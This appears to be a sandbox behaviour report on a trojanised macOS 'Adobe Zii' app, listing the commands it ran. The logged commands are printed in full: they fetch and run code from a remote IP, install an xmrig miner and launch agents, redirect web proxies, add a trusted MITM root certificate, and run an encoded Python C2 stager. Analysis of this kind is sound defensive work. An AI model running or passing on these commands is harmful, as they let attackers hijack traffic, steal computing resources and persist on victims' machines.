Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/A/._amtlibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/._AJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/Versions/._CurrentJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/._VersionsJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10.bundle/._amtlibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._v10.bundleJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/._ResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/_CodeSignature/._CodeResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/.__CodeSignatureJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/Resources/._libConfigurer.dylibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/Resources/._Info.plistJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/._ResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/A/._amtlibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/._AJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/Versions/._CurrentJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/._VersionsJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v10ME.bundle/._amtlibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._v10ME.bundleJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/._ResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/._CodeResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/_CodeSignature/._CodeResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/.__CodeSignatureJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/Resources/._Info.plistJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/._ResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/A/._amtlibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/._AJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/Versions/._CurrentJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/._VersionsJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/v6.bundle/._amtlibJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/Resources/._v6.bundleJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/._ResourcesJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/._Info.plistJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/Contents/._PkgInfoJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/sample.app/._ContentsJump to behavior
Source: /usr/bin/unzip (PID: 592)Hidden file created: sample/__MACOSX/._sample.appJump to behavior
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'Show sources
Source: /bin/sh (PID: 563)Osascript command executed: osascript -e do shell script 'networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem' with administrator privilegesJump to behavior
Source: /bin/sh (PID: 599)Osascript command executed: osascript -e do shell script 'networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem' with administrator privilegesJump to behavior
Executes commands using a shell command-line interpreterShow sources
Source: /Users/henry/Desktop/unpack/Adobe Zii.app/Contents/MacOS/Application Stub (PID: 546)Shell command executed: /bin/bash -c curl https://ptpb.pw/jj9a | python - & s=46.226.108.171:80 curl $s/sample.zip -o sample.zip unzip sample.zip -d sample cd sample cd __MACOSX open -a sample.app -Jump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550)Shell command executed: sh -c id -uJump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 553)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grepJump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 558)Shell command executed: /bin/sh -c ps 550Jump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 559)Shell command executed: /bin/sh -c cd /tmp && curl -o uploadminer.sh http://46.226.108.171/uploadminer.sh && chmod +x ./uploadminer.sh && ./uploadminer.shJump to behavior
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 566)Shell command executed: /bin/sh -c networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pemJump to behavior
Source: /usr/sbin/networksetup (PID: 567)Shell command executed: sh -c /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.oldJump to behavior
Source: /usr/sbin/networksetup (PID: 569)Shell command executed: sh -c /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.oldJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579)Shell command executed: sh -c id -uJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 582)Shell command executed: /bin/sh -c ps -ef | grep Little\ Snitch | grep -v grepJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 588)Shell command executed: /bin/sh -c ps 579Jump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 595)Shell command executed: /bin/sh -c cd /tmp && curl -o uploadminer.sh http://46.226.108.171/uploadminer.sh && chmod +x ./uploadminer.sh && ./uploadminer.shJump to behavior
Source: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid (PID: 602)Shell command executed: /bin/sh -c networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pemJump to behavior
Source: /usr/sbin/networksetup (PID: 603)Shell command executed: sh -c /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.oldJump to behavior
Source: /usr/sbin/networksetup (PID: 605)Shell command executed: sh -c /bin/cp /Library/Preferences/SystemConfiguration/preferences.plist /Library/Preferences/SystemConfiguration/preferences.plist.oldJump to behavior
Executes the "chmod" command used to modify permissionsShow sources
Source: /bin/sh (PID: 561)Chmod executable: /bin/chmod -> chmod +x ./uploadminer.shJump to behavior
Source: /bin/sh (PID: 589)Chmod executable: /bin/chmod -> chmod +x ./xmrigJump to behavior
Source: /bin/sh (PID: 597)Chmod executable: /bin/chmod -> chmod +x ./uploadminer.shJump to behavior
Source: /bin/sh (PID: 614)Chmod executable: /bin/chmod -> chmod +x ./xmrigJump to behavior
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)Show sources
Source: /bin/bash (PID: 549)Curl executable: /usr/bin/curl -> curl https://ptpb.pw/jj9aJump to behavior
Source: /bin/sh (PID: 560)Curl executable: /usr/bin/curl -> curl -o uploadminer.sh http://46.226.108.171/uploadminer.shJump to behavior
Source: /bin/sh (PID: 571)Curl executable: /usr/bin/curl -> curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pemJump to behavior
Source: /bin/sh (PID: 574)Curl executable: /usr/bin/curl -> curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plistJump to behavior
Source: /bin/sh (PID: 575)Curl executable: /usr/bin/curl -> curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plistJump to behavior
Source: /bin/sh (PID: 580)Curl executable: /usr/bin/curl -> curl -o config.json http://46.226.108.171/config.jsonJump to behavior
Source: /bin/sh (PID: 581)Curl executable: /usr/bin/curl -> curl -o xmrig http://46.226.108.171/xmrigJump to behavior
Source: /bin/bash (PID: 551)Curl executable: /usr/bin/curl -> curl 46.226.108.171:80/sample.zip -o sample.zipJump to behavior
Source: /bin/sh (PID: 596)Curl executable: /usr/bin/curl -> curl -o uploadminer.sh http://46.226.108.171/uploadminer.shJump to behavior
Source: /bin/sh (PID: 607)Curl executable: /usr/bin/curl -> curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pemJump to behavior
Source: /bin/sh (PID: 608)Curl executable: /usr/bin/curl -> curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plistJump to behavior
Source: /bin/sh (PID: 609)Curl executable: /usr/bin/curl -> curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plistJump to behavior
Source: /bin/sh (PID: 612)Curl executable: /usr/bin/curl -> curl -o config.json http://46.226.108.171/config.jsonJump to behavior
Source: /bin/sh (PID: 613)Curl executable: /usr/bin/curl -> curl -o xmrig http://46.226.108.171/xmrigJump to behavior
Executes the "grep" command used to find patterns in files or piped streamsShow sources
Source: /bin/sh (PID: 555)Grep executable: /usr/bin/grep -> grep Little SnitchJump to behavior
Source: /bin/sh (PID: 556)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
Source: /bin/sh (PID: 584)Grep executable: /usr/bin/grep -> grep Little SnitchJump to behavior
Source: /bin/sh (PID: 585)Grep executable: /usr/bin/grep -> grep -v grepJump to behavior
Executes the "ps" command used to list the status of processesShow sources
Source: /bin/sh (PID: 554)Ps executable: /bin/ps -> ps -efJump to behavior
Source: /bin/sh (PID: 558)Ps executable: /bin/ps -> ps 550Jump to behavior
Source: /bin/sh (PID: 583)Ps executable: /bin/ps -> ps -efJump to behavior
Source: /bin/sh (PID: 588)Ps executable: /bin/ps -> ps 579Jump to behavior
Executes the "python" command used to interpret Python scriptsShow sources
Source: /bin/bash (PID: 550)Python executable: /Library/Frameworks/Python.framework/Versions/2.7/bin/python -> python -Jump to behavior
Source: /usr/libexec/xpcproxy (PID: 579)Python executable: /usr/bin/python -> python -c import sys,base64,warnings warnings.filterwarnings('ignore') exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly80Ni4yMjYuMTA4LjE3MTo0NDQ0Jzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1TWURGaW95d3RjRmJVUjVVM0VTVDk2U2JxVms9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7CklWPWFbMDo0XTtkYXRhPWFbNDpdO2tleT1JVisnM2YyMzlmNjhhMDM1ZDQwZTE4OTFkOGI1Jump to behavior
Executes the "security_authtrampoline" command used to authorize execution with root privileges (GUI prompt)Show sources
Source: /usr/bin/osascript (PID: 566)Security_authtrampoline executable: /usr/libexec/security_authtrampoline -> /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 12 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pemJump to behavior
Source: /usr/bin/osascript (PID: 602)Security_authtrampoline executable: /usr/libexec/security_authtrampoline -> /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 12 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c networksetup -setsecurewebproxy Wi-Fi 46.226.108.171 8080 && networksetup -setwebproxy Wi-Fi 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pemJump to behavior
Explicitly loads/starts launch servicesShow sources
Source: /bin/sh (PID: 576)Launch agent/daemon loaded: launchctl load -w com.apple.rig.plistJump to behavior
Source: /bin/sh (PID: 578)Launch agent/daemon loaded: launchctl load -w com.proxy.initialize.plistJump to behavior
Source: /bin/sh (PID: 610)Launch agent/daemon loaded: launchctl load -w com.apple.rig.plistJump to behavior
Source: /bin/sh (PID: 611)Launch agent/daemon loaded: launchctl load -w com.proxy.initialize.plistJump to behavior
Opens applications that may be created onesShow sources
Source: /bin/bash (PID: 594)Application opened: open -a sample.appJump to behavior
Reads launchservices plist filesShow sources
Source: /Users/henry/Desktop/unpack/Adobe Zii.app/Contents/MacOS/Application Stub (PID: 546)Launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Source: /Users/henry/Desktop/unpack/Adobe Zii.app/Contents/MacOS/Application Stub (PID: 546)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/bin/osascript (PID: 563)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/bin/open (PID: 594)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Source: /usr/bin/osascript (PID: 599)Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plistJump to behavior
Reads user launchservices plist file containing default apps for corresponding file typesShow sources
Source: /Users/henry/Desktop/unpack/Adobe Zii.app/Contents/MacOS/Application Stub (PID: 546)Preferences launchservices plist file read: /Users/henry/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plistJump to behavior
Uses AppleScript framework/components containing Apple Script related functionalitiesShow sources
Source: /usr/bin/osascript (PID: 563)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 563)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 599)AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 599)AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plistJump to behavior
Uses AppleScript scripting additions containing additional functionalities for Apple ScriptsShow sources
Source: /usr/bin/osascript (PID: 563)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 563)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 599)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 599)AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plistJump to behavior
Writes 64-bit Mach-O files to diskShow sources
Source: /usr/bin/curl (PID: 581)File written: /Users/Shared/xmrig
Source: /usr/bin/unzip (PID: 592)File written: /Users/henry/sample/sample.app/Contents/MacOS/Adobe ZiiJump to dropped file
Source: /usr/bin/unzip (PID: 592)File written: /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/Resources/libConfigurer.dylibJump to dropped file
Source: /usr/bin/curl (PID: 613)File written: /Users/Shared/xmrigJump to dropped file
Writes FAT Mach-O files to diskShow sources
Source: /usr/bin/unzip (PID: 592)File written: /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/Resources/libConfigurer.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 592)File written: /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/amtlibJump to dropped file
Source: /usr/bin/unzip (PID: 592)File written: /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/Resources/libConfigurer.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 592)File written: /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/amtlibJump to dropped file
Source: /usr/bin/unzip (PID: 592)File written: /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/Resources/libConfigurer.dylibJump to dropped file
Source: /usr/bin/unzip (PID: 592)File written: /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/amtlibJump to dropped file
Source: /usr/bin/unzip (PID: 592)File written: /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/amtlibJump to dropped file
Source: /usr/bin/unzip (PID: 592)File written: /Users/henry/sample/sample.app/Contents/Resources/v6.bundle/Versions/A/amtlibJump to dropped file
Writes ZIP files to diskShow sources
Source: /usr/bin/curl (PID: 551)ZIP file created: /Users/henry/sample.zipJump to dropped file
Writes a file containing only its PIDShow sources
Source: /usr/sbin/networksetup (PID: 567)File written: /Library/Preferences/SystemConfiguration/preferences.plist-lock -> contains PID 567
Source: /usr/sbin/networksetup (PID: 569)File written: /Library/Preferences/SystemConfiguration/preferences.plist-lock -> contains PID 569
Source: /usr/sbin/networksetup (PID: 603)File written: /Library/Preferences/SystemConfiguration/preferences.plist-lock -> contains PID 603
Source: /usr/sbin/networksetup (PID: 605)File written: /Library/Preferences/SystemConfiguration/preferences.plist-lock -> contains PID 605Jump to dropped file
Writes icon files to diskShow sources
Source: /usr/bin/unzip (PID: 592)File written: /Users/henry/sample/sample.app/Contents/Resources/AppIcon.icnsJump to dropped file
App bundle is code signedShow sources
Source: Submitted file: TnrhsyteX1.appCodeResources XML file: CodeResources
Source: Submitted file: TnrhsyteX1.appCodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.drCodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.drCodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.drCodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.drCodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.drCodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.drCodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.drCodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.drCodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.drCodeResources XML file: CodeResources
Source: Submitted file: sample.zip.256.drCodeResources XML file: CodeResources
Creates application bundles containing icon filesShow sources
Source: /usr/bin/unzip (PID: 592)Icon file created: sample/sample.app/Contents/Resources/AppIcon.icnsJump to behavior
Source: /usr/bin/unzip (PID: 592)Icon file created: sample/__MACOSX/sample.app/Contents/Resources/._AppIcon.icnsJump to behavior
Reads data from the local random generatorShow sources
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550)Random device file read: /dev/urandomJump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550)Random device file read: /dev/urandomJump to behavior
Source: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 550)Random device file read: /dev/urandomJump to behavior
Source: /usr/bin/osascript (PID: 563)Random device file read: /dev/randomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579)Random device file read: /dev/urandomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579)Random device file read: /dev/urandomJump to behavior
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 579)Random device file read: /dev/urandomJump to behavior
Source: /usr/bin/osascript (PID: 599)Random device file read: /dev/randomJump to behavior
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Users/henry/Desktop/unpack/Adobe Zii.app/Contents/MacOS/Application Stub (PID: 546)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 563)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Source: /usr/bin/osascript (PID: 599)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Uses the Python frameworkShow sources
Source: /Library/Frameworks/Python.framework/Versions/2.7/bin/python (PID: 550)Python framework application: /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Source: /usr/bin/python (PID: 579)Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/PythonJump to behavior
Writes property list (.plist) files to diskShow sources
Source: /usr/sbin/networksetup (PID: 567)XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist-new
Source: /bin/cp (PID: 568)XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/sbin/networksetup (PID: 569)XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist-newJump to dropped file
Source: /bin/cp (PID: 570)XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /usr/bin/curl (PID: 574)XML plist file created: /Users/henry/Library/LaunchAgents/com.apple.rig.plist
Source: /usr/bin/curl (PID: 575)XML plist file created: /Users/henry/Library/LaunchAgents/com.proxy.initialize.plist
Source: /usr/bin/unzip (PID: 592)XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/_CodeSignature/CodeResourcesJump to dropped file
Source: /usr/bin/unzip (PID: 592)XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v9.bundle/Versions/A/Resources/Info.plistJump to dropped file
Source: /usr/bin/unzip (PID: 592)Binary plist file created: /Users/henry/sample/sample.app/Contents/Resources/Base.lproj/MainMenu.nibJump to dropped file
Source: /usr/bin/unzip (PID: 592)XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/_CodeSignature/CodeResourcesJump to dropped file
Source: /usr/bin/unzip (PID: 592)XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v9ME.bundle/Versions/A/Resources/Info.plistJump to dropped file
Source: /usr/bin/unzip (PID: 592)XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/_CodeSignature/CodeResourcesJump to dropped file
Source: /usr/bin/unzip (PID: 592)XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v10.bundle/Versions/A/Resources/Info.plistJump to dropped file
Source: /usr/bin/unzip (PID: 592)XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/_CodeSignature/CodeResourcesJump to dropped file
Source: /usr/bin/unzip (PID: 592)XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v10ME.bundle/Versions/A/Resources/Info.plistJump to dropped file
Source: /usr/bin/unzip (PID: 592)XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v6.bundle/Versions/A/_CodeSignature/CodeResourcesJump to dropped file
Source: /usr/bin/unzip (PID: 592)XML plist file created: /Users/henry/sample/sample.app/Contents/Resources/v6.bundle/Versions/A/Resources/Info.plistJump to dropped file
Source: /usr/bin/unzip (PID: 592)XML plist file created: /Users/henry/sample/sample.app/Contents/Info.plistJump to dropped file
Source: /bin/cp (PID: 604)XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.old
Source: /bin/cp (PID: 606)XML plist file created: /Library/Preferences/SystemConfiguration/preferences.plist.oldJump to dropped file
Source: /usr/bin/curl (PID: 608)XML plist file created: /Users/henry/Library/LaunchAgents/com.apple.rig.plistJump to dropped file
Source: /usr/bin/curl (PID: 609)XML plist file created: /Users/henry/Library/LaunchAgents/com.proxy.initialize.plistJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49236 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49236
Source: unknownNetwork traffic detected: HTTP traffic on port 49237 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49237
Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49238
Source: unknownNetwork traffic detected: HTTP traffic on port 49239 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49239
Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49246
Source: unknownNetwork traffic detected: HTTP traffic on port 49247 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49247
Source: unknownNetwork traffic detected: HTTP traffic on port 49248 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49248
Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 4444
Source: unknownNetwork traffic detected: HTTP traffic on port 4444 -> 49250

Language, Device and Operating System Detection:

barindex
Reads process information of other processesShow sources
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.556 -> queries PID 556Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.555 -> queries PID 555Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.553 -> queries PID 553Jump to behavior
Source: /bin/ps (PID: 554)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.552 -> queries PID 552Jump to behavior
